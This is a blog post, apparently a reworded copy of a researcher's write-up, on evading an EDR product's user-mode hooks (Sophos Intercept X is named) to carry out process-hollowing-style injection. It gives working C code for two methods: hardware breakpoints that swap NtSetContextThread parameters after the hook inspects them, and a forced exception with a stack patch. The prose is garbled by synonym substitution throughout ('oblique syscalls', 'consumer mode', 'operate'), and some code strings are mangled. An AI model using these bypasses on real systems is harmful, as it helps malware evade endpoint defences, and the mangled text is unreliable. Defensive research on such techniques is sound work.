Foolish EDR Bypasses and The place To Discover Them

Lately I used to be testing some EDR’s talents to detect oblique syscalls, and I had an thought for a unusual bypass.
In the event you’re not already conversant in direct and oblique syscalls, I like to recommend studying this text first.

One of many drawbacks of direct & oblique syscalls is that it’s clear from the callstack that you simply bypassed the EDR’s consumer mode hook.
Beneath are some instance callstacks from direct, oblique, and common calls.

The callstack of a direct syscall.

The callstack of an oblique syscall.

The callstack of an everyday hooked Nt operate name.

As you may see from the final picture, when a name is completed by way of a hooked operate the return handle for the EDR’s hook seems within the callstack (in my case that is hmpalert).
It’s an attention-grabbing dilemma: we don’t wish to name the hooked operate as a result of that would set off a detection, but when we bypass the hook fully, that would set off a detection too.

That is after I had considerably of a humorous thought. What if I do name the hooked operate, however do it in such a approach that the EDR isn’t capable of correctly examine the decision parameters.
Straight off the bat, I had a few concepts.

TOCTOU

Time-of-check to time-of-use, or TOCTOU for brief, is a way usually utilized in software program exploitation.
The vulnerability arises when a safety examine is carried out on an object, however nothing is prevented from modifying that object between the time it’s checked and the time it’s used.

Let’s take the next code for instance:

BOOL CopyData(char *src_buffer, uint32_t *src_size) {
  static char dest_buffer[1024];
  
    if(*src_size >= 1024) {
    printf("error, buffer overflow!"n);
    return FALSE;
  }
  
  memcpy(dest_buffer, src_buffer, *src_size);
  return TRUE;
}

Within the above, src_size is a pointer to an integer.
The operate fails if the desired dimension is greater than the vacation spot buffer.
Since src_size is a pointer, this system passes the handle of the variable to the operate as a substitute of its worth.
Throughout the operate’s execution, it’s solely attainable for this system to change the worth pointed to by src_size.

If the attacker manages to completely time altering the worth of src_size in order that it happens after if(*src_size >= 1024), however earlier than the memcpy() name, they will nonetheless set off a buffer overflow.
The worth solely must be lower than 1024 till after the if assertion is full, then it may be set to a worth bigger than dest_buffer.

Be aware: the above instance is extremely oversimplified, and in the true world the compiler would optimize this code to solely learn the worth of *src_size as soon as.

My preliminary thought was to make the most of an identical race situation towards the EDR’s hook.
Name a hooked operate with benign parameters, then shortly swap them out with malicious ones mid-call.
If we are able to time the change to happen after the EDR has ending inspecting the parameters, however earlier than the syscall instruction, we are able to bypass the hook with out really bypassing it.

While attempting to determine if there was a way I may keep away from modifying the parameters too quickly and triggering a detection occasion, I had one other, higher, thought.

Thought 2: {Hardware} Breakpoints

This concept was even less complicated.
Decide a ntdll operate I wish to name that’s hooked by the EDR, then place a {hardware} breakpoint on the syscall instruction.
{Hardware} breakpoints permit us to inform the CPU to set off an exception every time a sure handle is learn, written, or executed.
So, by putting an execute breakpoint on the syscall instruction we’ll be capable to intercept execution after the EDR has finished its checks, however earlier than the system name happens.
This mainly permits us to hook the EDR’s hook and switch any legit name right into a customized syscall.

What we’ll be capable to do is name a hooked operate with benign parameters that received’t set off a detection, then swap out the parameters with malicious ones after the EDR has already inspected the decision.
We will even, if we wish, change the system name quantity to invoke a unique syscall than the one the EDR thinks we’re making.
The {hardware} breakpoint might be triggered proper after the EDR has inspected our faux parameters, however earlier than the syscall instruction transitions to kernel mode.

When the kernel returns to consumer mode, it’ll return to the instruction immediately after the syscall, which is the place we are able to place a second breakpoint.
The second breakpoint handler can then change the parameters again to forestall the modifications being caught by any post-call inspection the EDR would possibly do.
In lots of circumstances the EDR received’t hassle with post-call inspection if the decision failed, so we may additionally simply change the EAX register to one thing like STATUS_NOT_FOUND, STATUS_INVALID_PARAMETER, or in homage to the TDSS rootkit: STATUS_TOO_MANY_SECRETS.

An instance of code movement from a hooked NtWriteFile operate.

The decision movement will go one thing like this:

  1. Name hooked Nt operate with benign parameters
  2. EDR inspects benign parameters
  3. EDR passes management again to the hooked Nt operate to carry out a syscall
  4. Our 1st breakpoint is triggered and we change parameters with malicious ones
  5. We proceed execution so the syscall is triggered
  6. The kernel makes use of our actual parameters then return to the Nt operate
  7. Our 2nd breakpoint is triggered and we change parameters again
  8. The EDR performs any post-call inspection and solely sees benign parameters

Ideally, the perfect targets are capabilities that use CPU registers or reminiscence pointer for parameters.
If we begin modifying stack variables, this might present up throughout callstack unwinding.

Discovering A Appropriate Goal

So as to take a look at my thought, I needed to give you a operate name that might instantly set off a detection occasion.
This really proved rather a lot more durable than I assumed it could be.
Many operations that I used to be positive would set off a detection didn’t.
In the long run, I settled for utilizing my previous course of injection code.

The code works considerably like course of hollowing.
It creates a brand new course of in a suspended state, injects itself into the suspended course of, then makes use of SetThreadContext() to alter the entrypoint of the principle thread to the entrypoint of the malicious code.
The goal I selected was Sophos Intercept X, as a result of it advertises detection of course of hollowing assaults.

If we reverse engineer the consumer mode hook, we are able to see precisely how course of hollowing is detected.

A snippet of the EDR’s NtSetContextThread hook handler.

Every time a brand new thread is created its instruction pointer is ready to RtlUserThreadStart().
The primary parameter of RtlUserThreadStart is the thread’s entrypoint, which might be referred to as after the operate is completed initializing the brand new thread.
In a brand-new course of there is just one thread, the principle thread, which is liable for calling the executable’s entrypoint.

Throughout course of hollowing, the executable’s code is unmapped and changed with malicious code.
Because it’s unlikely the previous and new code may have the very same entrypoint handle, it’s usually needed to change the thread’s begin handle.
By altering the primary parameter of RtlUserThreadStart() (the RCX register), we alter the entrypoint of the thread, and due to this fact entrypoint of the method.

Sophos’ detection merely checks if the code is attempting to make use of NtSetContextThread() to alter the RCX register of a brand new thread, which is suspicious conduct.
Since we are able to specify no matter entrypoint we wish when creating a brand new thread, it doesn’t make sense to alter it post-creation.
The one purpose to do that is that if the thread was created by one thing else, say, the PE Loader.

Bypassing The Examine With {Hardware} Breakpoint

There’s really fairly just a few methods I can consider to bypass this examine, however I’m solely fascinated about experimenting with CPU exceptions.
For our first instance, we’re merely going to set a breakpoint on the syscall and retn directions of NtSetContextThread().

Beneath is a few instance code I wrote to seek out these directions.

// discover the handle of the syscall and retn instruction inside a Nt* operate
BOOL FindSyscallInstruction(LPVOID nt_func_addr, LPVOID* syscall_addr, LPVOID* syscall_ret_addr) {
    BYTE* ptr = (BYTE*)nt_func_addr;

    // iterate by way of the native operate stub to seek out the syscall instruction
    for (int i = 0; i < 1024; i++) {

        // examine for syscall opcode (FF 05)
        if (*&ptr[i] == 0x0F && *&ptr[i + 1] == 0x05) {
            printf("Discovered syscall opcode at %llxn", (DWORD64)&ptr[i]);
            *syscall_addr = (LPVOID)&ptr[i];
            *syscall_ret_addr = (LPVOID)&ptr[i + 2];
            break;
        }
    }

    // ensure we discovered the syscall instruction
    if (!*syscall_addr) {
        printf("error: syscall instruction not discoveredn");
        return FALSE;
    }

    // ensure the instruction after syscall is retn
    if (**(BYTE**)syscall_ret_addr != 0xc3) {
        printf("Error: syscall instruction not adopted by retn");
        return FALSE;
    }

    return TRUE;
}

Sadly, the debug registers are privileged registers, which implies we are able to’t set them immediately from consumer mode.
So as to arrange a {hardware} breakpoint, we have to make the most of NtSetContextThread(), which is just a little ironic.
We’ll mainly be utilizing NtSetContextThread to bypass the hook on NtSetContextThread.

To arrange our {hardware} breakpoints we’ll have to set DR0 and DR1 to the addresses we wish to break on, then DR7 tells the CPU what sort of breakpoints we wish.

thread_context.ContextFlags = CONTEXT_FULL;

// get the present thread context (word, this have to be a suspended thread)
GetThreadContext(thread_handle, &thread_context);

dr7_t dr7 = { 0 };

dr7.dr0_local = 1; // set DR0 as an execute breakpoint
dr7.dr1_local = 1; // set DR1 as an execute breakpoint

thread_context.ContextFlags = CONTEXT_ALL;

thread_context.Dr0 = (DWORD64)syscall_addr;     // set DR0 to interrupt on syscall handle
thread_context.Dr1 = (DWORD64)syscall_ret_addr; // set DR1 to interrupt on syscall ret handle
thread_context.Dr7 = *(DWORD*)&dr7;

// use SetThreadContext to replace the debug registers
SetThreadContext(thread_handle, &thread_context);

Contained in the breakpoint handler, we’ll simply alter the RCX and RDX register, which include argument 1 and argument 2 of NtSetContextThread().
Previous to the decision we are able to retailer the true values in a world variable, name NtSetContextThread with some faux values, then have our exception handler replaces the faux values with the true ones.

For the reason that system name stub strikes the primary parameter from RCX into R10, we’ll set each simply to be protected.

LONG WINAPI BreakpointHandler(PEXCEPTION_POINTERS e)
{
	// {hardware} breakpoints set off a single step exception
	if (e->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP) {
		// this exception was attributable to DR0 (syscall breakpoint)
		if (e->ContextRecord->Dr6 & 0x1) {
			// change the faux parameters with the true ones
			e->ContextRecord->Rcx = (DWORD64)g_thread_handle;
			e->ContextRecord->R10 = (DWORD64)g_thread_handle;
			e->ContextRecord->Rdx = (DWORD64)g_thread_context;
		}

		// this exception was attributable to DR1 (syscall ret breakpoint)
		if (e->ContextRecord->Dr6 & 0x2) {
			// set the parameters again to faux ones
			// since x64 makes use of registers for the primary 4 parameters, we needn't do something right here
			// for calls with greater than 4 parameters, we would want to change the stack
		}
	}

	e->ContextRecord->EFlags |= (1 << 16); // set the ResumeFlag to proceed execution

	return EXCEPTION_CONTINUE_EXECUTION;
}
}

We will solely learn/write the context on a suspended thread, so we’ll simply create a brand new suspended thread to name NtSetContextThread().
We’ll use NtSetContextThread(NULL, NULL) for our faux parameters.

DWORD SetThreadContextThread(LPVOID param) {
    NtSetContextThread(NULL, NULL);
    return 0;
}

// calling our particular NtSetThreadContext
SetUnhandledExceptionFilter(BreakpointHandler);
HANDLE new_thread = CreateThread(NULL, NULL, SetThreadContextThread, NULL, CREATE_SUSPENDED, NULL);
SetSyscallBreakpoints((LPVOID)NtSetContextThread, new_thread);
ResumeThread(new_thread);

The End result

First, let’s see what occurs once we simply name NtSetContextThread() usually.

Now, once more, however with our particular breakpoint sauce:

Success! The code was capable of inject itself into notepad and show a message field.

However, I really wish to go a step higher. Having to name NtSetContextThread to arrange our {hardware} breakpoints isn’t nice.
The EDR may use its NtSetContextThread hook to see if we’re attempting to set breakpoints that’d intrude with the EDR.
So, what about common previous exceptions?

Thought 3: Intentional Exception

As a substitute of {hardware} breakpoints, we’re going to try to trigger a CPU exception.
Common exceptions might be dealt with in the very same approach as breakpoint exceptions, however we don’t have to name NtSetContextThread() to set them up.

We already know the EDR inspects the context struction every time we name NtSetContextThread(), so let’s use that to our benefit.
Most software program checks if an handle is NULL earlier than attempting to learn it, however what if it’s neither NULL nor a sound handle?
What occurs if we set the context handle to 0x1337?

Let’s attempt the next:

HANDLE thread_handle = CreateThread(NULL, 0, test_thread, NULL, CREATE_SUSPENDED, 0);
SetThreadContext(thread_handle, (CONTEXT*)0x1337);

Then we run it and…

Whoops, the EDR’s hook tried to learn the invalid reminiscence and crashed the method.

Now we now have a simple approach of triggering an exception with none {hardware} breakpoints.
The difficult half is the exception happens contained in the EDR’s handler, circuitously earlier than the syscall, so it’s a lot more durable to interchange the faux parameters with the true ones.
We additionally have to correctly deal with the exception so the method received’t crash.

From a mixture of the crashdump and our earlier disassembly, we already know the EDR is attempting to learn the context->Rcx area into the RDX register.

The exception is triggered on line 1 of this pseudocode.

We may use a disassembler to make a extra generic bypass, however since that is only a PoC, we’ll hardcode it to this particular EDR model.
The instruction that triggers the exception is mov rdx, qword [rbx+0x80], which implies the context pointer (0x1337) is in RBX.
We’ll merely set RBX to level to an empty CONTEXT construction, which can end in thread_context->Rcx being zero, and the EDR not triggering a detection.

For the syscall to succeed now that the EDR’s examine has been bypassed, we nonetheless want to repair the invalid context pointer.
The operate the place the exception happens is simply liable for inspecting our context construction and doesn’t provoke the syscall.
Nevertheless, the context pointer that is handed to the syscall, is saved someplace on the stack by the EDR.
The lazy repair is to only stroll the stack and change each occasion of 0x1337 with the handle of our actual context construction.

// exception handler for pressured exception
LONG WINAPI ExceptionHandler(PEXCEPTION_POINTERS e)
{
	static CONTEXT fake_context = { 0 };

	printf("Exception handler triggered at handle: 0xpercentllxn", e->ExceptionRecord->ExceptionAddress);
	
	DWORD64* stack_ptr = (DWORD64*)e->ContextRecord->Rsp;
	
	// iterate first 300 stack objects, in search of our faux handle
	for (int i = 0; i < 300; i++) {
		if (*stack_ptr == 0x1337) {
			// change the faux handle with the true one
			*stack_ptr = (DWORD64)g_thread_context;

			printf("Mounted stack worth at RSP+(0x8*0xpercentx) (0xpercentllx): 0xpercentllxn", 
				   i, (DWORD64)stack_ptr, (DWORD64)*stack_ptr);
		}
		stack_ptr++;
	}
	
	// The pointer to our invalid handle is in RBX, so change it with an empty construction
	// the RCX member of the context construction being NULL will trigger the EDR to skip its examine
	e->ContextRecord->Rbx = (DWORD64)&fake_context;

	return EXCEPTION_CONTINUE_EXECUTION;
}

Now we simply run the code and see what occurs…

Good! It really works.

So there we now have it, two methods to bypass EDR hooks with out bypassing EDR hooks.
Although, I’m unsure how sensible or straightforward it could be to show the pressured exception methodology right into a generic EDR bypass.
Since we are able to’t simply change pointers again after the syscall, and it solely works with calls the place the EDR reads pointers,
it’s pretty restricted. The primary methodology is much extra generic, however most likely additionally far simpler to write down detections for.

It’s attainable we may mix each strategies because of the truth exception handlers permit us to change a thread’s context with out the usage of NtSetContextThread().
We may power an exception, then use the exception handler to arrange our {hardware} breakpoints.

However anyway, I’m going to depart it there. This was only a enjoyable little weekend facet mission I figured I’d submit. Hopefully somebody will discover this data useful.

I’ve uploaded the total course of injection proof of idea to my GitHub right here: github.com/MalwareTech/EDRception

Leave a Reply

Your email address will not be published. Required fields are marked *